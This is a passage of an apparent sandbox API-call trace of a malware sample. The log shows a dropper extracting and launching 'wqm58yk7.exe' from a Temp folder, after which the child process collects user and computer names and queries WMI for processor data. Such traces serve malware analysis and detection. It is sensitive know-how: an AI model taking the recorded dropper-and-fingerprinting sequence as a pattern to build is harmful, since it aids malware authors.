lpNumberOfBytesWritten=0x322fd18*=0x6b71, lpOverlapped=0x0) returned 1 [0050.854] GetTickCount () returned 0x1146162 [0050.854] ReadFile (in: hFile=0x17c, lpBuffer=0x41d428, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x322fd0c, lpOverlapped=0x0 | out: lpBuffer=0x41d428*, lpNumberOfBytesRead=0x322fd0c*=0x4000, lpOverlapped=0x0) returned 1 [0050.855] GetTickCount () returned 0x1146162 [0050.855] WriteFile (in: hFile=0x1c, lpBuffer=0x421428*, nNumberOfBytesToWrite=0x5705, lpNumberOfBytesWritten=0x322fd18, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesWritten=0x322fd18*=0x5705, lpOverlapped=0x0) returned 1 [0050.855] GetTickCount () returned 0x1146162 [0050.855] ReadFile (in: hFile=0x17c, lpBuffer=0x41d428, nNumberOfBytesToRead=0x1151, lpNumberOfBytesRead=0x322fd0c, lpOverlapped=0x0 | out: lpBuffer=0x41d428*, lpNumberOfBytesRead=0x322fd0c*=0x1151, lpOverlapped=0x0) returned 1 [0050.855] GetTickCount () returned 0x1146162 [0050.855] MulDiv (nNumber=53585, nNumerator=100, nDenominator=53585) returned 100 [0050.855] wsprintfA (in: param_1=0x322fd28, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0050.855] lstrlenA (lpString="Extract: wqm58yk7.exe") returned 21 [0050.855] lstrlenA (lpString="... 100%") returned 8 [0050.855] lstrcatA (in: lpString1="Extract: wqm58yk7.exe", lpString2="... 100%" | out: lpString1="Extract: wqm58yk7.exe... 100%") returned="Extract: wqm58yk7.exe... 100%" [0050.855] SetWindowTextA (hWnd=0x202a8, lpString="Extract: wqm58yk7.exe... 100%") returned 1 [0050.857] SendMessageA (hWnd=0x202a6, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x2 [0050.858] SendMessageA (hWnd=0x202a6, Msg=0x1006, wParam=0x0, lParam=0x322fcdc) returned 0x1 [0050.858] SendMessageA (hWnd=0x202a6, Msg=0x1013, wParam=0x1, lParam=0x0) returned 0x1 [0050.858] WriteFile (in: hFile=0x1c, lpBuffer=0x421428*, nNumberOfBytesToWrite=0x1742, lpNumberOfBytesWritten=0x322fd18, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesWritten=0x322fd18*=0x1742, lpOverlapped=0x0) returned 1 [0050.858] SetFileTime (hFile=0x1c, lpCreationTime=0x322ff40, lpLastAccessTime=0x0, lpLastWriteTime=0x322ff40) returned 1 [0050.859] CloseHandle (hObject=0x1c) returned 1 [0050.861] MulDiv (nNumber=2, nNumerator=30000, nDenominator=3) returned 20000 [0050.861] SendMessageA (hWnd=0x40278, Msg=0x402, wParam=0x4e20, lParam=0x0) returned 0x2710 [0050.862] lstrcpynA (in: lpString1=0x42e3a1, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.862] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 57 [0050.862] lstrcpynA (in: lpString1=0x40a418, lpString2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"", iMaxLength=1024 | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"" [0050.862] lstrcpynA (in: lpString1=0x42a050, lpString2="Execute: ", iMaxLength=1024 | out: lpString1="Execute: ") returned="Execute: " [0050.862] lstrlenA (lpString="Execute: ") returned 9 [0050.862] lstrlenA (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"") returned 72 [0050.862] lstrcatA (in: lpString1="Execute: ", lpString2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"" | out: lpString1="Execute: \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"") returned="Execute: \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"" [0050.862] SetWindowTextA (hWnd=0x202a8, lpString="Execute: \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"") returned 1 [0050.863] SendMessageA (hWnd=0x202a6, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x2 [0050.863] SendMessageA (hWnd=0x202a6, Msg=0x1007, wParam=0x0, lParam=0x322fd54) returned 0x2 [0050.863] SendMessageA (hWnd=0x202a6, Msg=0x1013, wParam=0x2, lParam=0x0) returned 0x1 [0050.863] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x42c078*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x322fd78 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"", lpProcessInformation=0x322fd78*(hProcess=0x1b0, hThread=0x1c, dwProcessId=0x71c, dwThreadId=0x434)) returned 1 [0050.878] CloseHandle (hObject=0x1c) returned 1 [0050.878] CloseHandle (hObject=0x1b0) returned 1 [0050.878] MulDiv (nNumber=3, nNumerator=30000, nDenominator=3) returned 30000 [0050.878] SendMessageA (hWnd=0x40278, Msg=0x402, wParam=0x7530, lParam=0x0) returned 0x4e20 [0050.878] SendMessageA (hWnd=0x3015e, Msg=0x404, wParam=0x0, lParam=0x0) returned 0x0 [0050.928] OleUninitialize () Process: id = "2" image_name = "wqm58yk7.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe" page_root = "0x3f45b000" os_pid = "0x71c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa48" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x434 [0052.294] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0053.609] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x26c838 | out: pfEnabled=0x26c838) returned 0x0 [0053.897] GetUserNameW (in: lpBuffer=0x26cddc, pcbBuffer=0x26d054 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d054) returned 1 [0053.902] GetComputerNameW (in: lpBuffer=0x26cddc, nSize=0x26d054 | out: lpBuffer="XDUWTFONO", nSize=0x26d054) returned 1 [0054.101] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1fc [0054.111] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cfb8 | out: ppv=0x26cfb8*=0x6ded34) returned 0x0 [0054.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x26c248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0054.738] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x75240000 [0054.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x26c77c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 13 [0054.973] GetProcAddress (hModule=0x75240000, lpProcName="ResetSecurity") returned 0x752424de [0055.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x26c77c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0055.008] GetProcAddress (hModule=0x75240000, lpProcName="SetSecurity") returned 0x75242520 [0055.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x26c778, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 18 [0055.019] GetProcAddress (hModule=0x75240000, lpProcName="BlessIWbemServices") returned 0x75241c69 [0055.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x26c770, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 24 [0055.051] GetProcAddress (hModule=0x75240000, lpProcName="BlessIWbemServicesObject") returned 0x75241cbb [0055.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x26c778, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 17 [0055.083] GetProcAddress (hModule=0x75240000, lpProcName="GetPropertyHandle") returned 0x752421b4 [0055.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x26c778, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 18 [0055.097] GetProcAddress (hModule=0x75240000, lpProcName="WritePropertyValue") returned 0x75242617 [0055.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x26c784, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 5 [0055.113] GetProcAddress (hModule=0x75240000, lpProcName="Clone") returned 0x75241d0d [0055.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x26c778, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0055.123] GetProcAddress (hModule=0x75240000, lpProcName="VerifyClientKey") returned 0x752425b4 [0055.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x26c778, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0055.130] GetProcAddress (hModule=0x75240000, lpProcName="GetQualifierSet") returned 0x75242215 [0055.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x26c784, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0055.132] GetProcAddress (hModule=0x75240000, lpProcName="Get") returned 0x752420d4 [0055.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x26c784, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0055.164] GetProcAddress (hModule=0x75240000, lpProcName="Put") returned 0x752422be [0055.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x26c784, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 6 [0055.183] GetProcAddress (hModule=0x75240000, lpProcName="Delete") returned 0x75241f31 [0055.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x26c780, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 8 [0055.196] GetProcAddress (hModule=0x75240000, lpProcName="GetNames") returned 0x75242182 [0055.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x26c778, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 16 [0055.236] GetProcAddress (hModule=0x75240000, lpProcName="BeginEnumeration") returned 0x75241c43 [0055.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x26c784, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 4 [0055.244] GetProcAddress (hModule=0x75240000, lpProcName="Next") returned 0x75242283 [0055.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x26c77c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 14 [0055.259] GetProcAddress (hModule=0x75240000, lpProcName="EndEnumeration") returned 0x75241fc2 [0055.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x26c770, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0055.267] GetProcAddress (hModule=0x75240000, lpProcName="GetPropertyQualifierSet") returned 0x752421ff [0055.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x26c784, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 5 [0055.278] GetProcAddress (hModule=0x75240000, lpProcName="Clone") returned 0x75241d0d [0055.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x26c77c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 13 [0055.278] GetProcAddress (hModule=0x75240000, lpProcName="GetObjectText") returned 0x7524219e [0055.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x26c778, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 17 [0055.292] GetProcAddress (hModule=0x75240000, lpProcName="SpawnDerivedClass") returned 0x75242566 [0055.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x26c77c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 13 [0055.297] GetProcAddress (hModule=0x75240000, lpProcName="SpawnInstance") returned 0x7524257c [0055.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x26c780, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 9 [0055.298] GetProcAddress (hModule=0x75240000, lpProcName="CompareTo") returned 0x75241d8d [0055.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x26c778, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1a8uv\x97êø\x94 t@Ê&", lpUsedDefaultChar=0x0) returned 17 [0055.303] GetProcAddress (hModule=0x75240000, lpProcName="GetPropertyOrigin") returned 0x752421e9 [0055.363] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cfb0 | out: pAptType=0x26cfb0*=1) returned 0x0 [0055.366] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cfb4 | out: ppvObject=0x26cfb4*=0x0) returned 0x80004002 [0055.366] IUnknown:Release (This=0x6ded34) returned 0x0 [0055.396] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x26cc0c | out: lpiid=0x26cc0c) returned 0x0 [0055.398] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c920 | out: ppv=0x26c920*=0x5210810) returned 0x0 [0056.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210810, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26cb38 | out: ppvObject=0x26cb38*=0x0) returned 0x80004002 [0056.571] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5210810, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cb4c | out: ppvObject=0x26cb4c*=0x5210820) returned 0x0 [0056.571] WbemDefPath:IUnknown:Release (This=0x5210810) returned 0x0 [0056.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c76c | out: ppvObject=0x26c76c*=0x5210820) returned 0x0 [0056.573] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c728 | out: ppvObject=0x26c728*=0x0) returned 0x80004002 [0056.573] WbemDefPath:IUnknown:AddRef (This=0x5210820) returned 0x3 [0056.573] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c084 | out: ppvObject=0x26c084*=0x0) returned 0x80004002 [0056.573] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c034 | out: ppvObject=0x26c034*=0x0) returned 0x80004002 [0056.573] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c040 | out: ppvObject=0x26c040*=0x6f9f78) returned 0x0 [0056.573] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6f9f78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c048 | out: pCid=0x26c048*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0056.573] WbemDefPath:IUnknown:Release (This=0x6f9f78) returned 0x3 [0056.574] CoGetContextToken (in: pToken=0x26c0a0 | out: pToken=0x26c0a0) returned 0x0 [0056.574] CoGetContextToken (in: pToken=0x26c4a8 | out: pToken=0x26c4a8) returned 0x0 [0056.574] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c538 | out: ppvObject=0x26c538*=0x0) returned 0x80004002 [0056.574] WbemDefPath:IUnknown:Release (This=0x5210820) returned 0x2 [0056.574] WbemDefPath:IUnknown:Release (This=0x5210820) returned 0x1 [0056.574] CoGetContextToken (in: pToken=0x26ce30 | out: pToken=0x26ce30) returned 0x0 [0056.574] CoGetContextToken (in: pToken=0x26cd90 | out: pToken=0x26cd90) returned 0x0 [0056.574] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210820, riid=0x26ce60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26ce5c | out: ppvObject=0x26ce5c*=0x5210820) returned 0x0 [0056.574] WbemDefPath:IUnknown:AddRef (This=0x5210820) returned 0x3 [0056.574] WbemDefPath:IUnknown:Release (This=0x5210820) returned 0x2 [0056.577] WbemDefPath:IWbemPath:SetText (This=0x5210820, uMode=0x4, pszPath="win32_processor") returned 0x0 [0056.579] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210820, puCount=0x26cfe4 | out: puCount=0x26cfe4*=0x0) returned 0x0 [0056.580] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cfe0*=0x0, pszText=0x0 | out: puBuffLength=0x26cfe0*=0x10, pszText=0x0) returned 0x0 [0056.581] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cfe0*=0x10, pszText="000000000000000" | out: puBuffLength=0x26cfe0*=0x10, pszText="win32_processor") returned 0x0 [0056.582] WbemDefPath:IWbemPath:GetInfo (in: This=0x5210820, uRequestedInfo=0x0, puResponse=0x26cfec | out: puResponse=0x26cfec*=0xc15) returned 0x0 [0056.582] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210820, puCount=0x26cfe4 | out: puCount=0x26cfe4*=0x0) returned 0x0 [0056.582] WbemDefPath:IWbemPath:GetInfo (in: This=0x5210820, uRequestedInfo=0x0, puResponse=0x26cfec | out: puResponse=0x26cfec*=0xc15) returned 0x0 [0056.585] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210820, puCount=0x26cfd4 | out: puCount=0x26cfd4*=0x0) returned 0x0 [0056.585] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cfd0*=0x0, pszText=0x0 | out: puBuffLength=0x26cfd0*=0x10, pszText=0x0) returned 0x0 [0056.585] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cfd0*=0x10, pszText="000000000000000" | out: puBuffLength=0x26cfd0*=0x10, pszText="win32_processor") returned 0x0 [0056.585] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210820, puCount=0x26cfd4 | out: puCount=0x26cfd4*=0x0) returned 0x0 [0056.585] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cfd0*=0x0, pszText=0x0 | out: puBuffLength=0x26cfd0*=0x10, pszText=0x0) returned 0x0 [0056.585] WbemDefPath:IWbemPath:GetText (in: This=0x5210820, lFlags=2, puBuffLength=0x26cfd0*=0x10, pszText="000000000000000" | out: puBuffLength=0x26cfd0*=0x10, pszText="win32_processor") returned 0x0 [0056.586] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210820, puCount=0x26cf64 | out: puCount=0x26cf64*=0x0) returned 0x0 [0056.586] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c818 | out: ppv=0x26c818*=0x6ded34) returned 0x0 [0056.587] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26c810 | out: pAptType=0x26c810*=1) returned 0x0 [0056.587] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26c814 | out: ppvObject=0x26c814*=0x0) returned 0x80004002 [0056.587] IUnknown:Release (This=0x6ded34) returned 0x0 [0056.588] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, 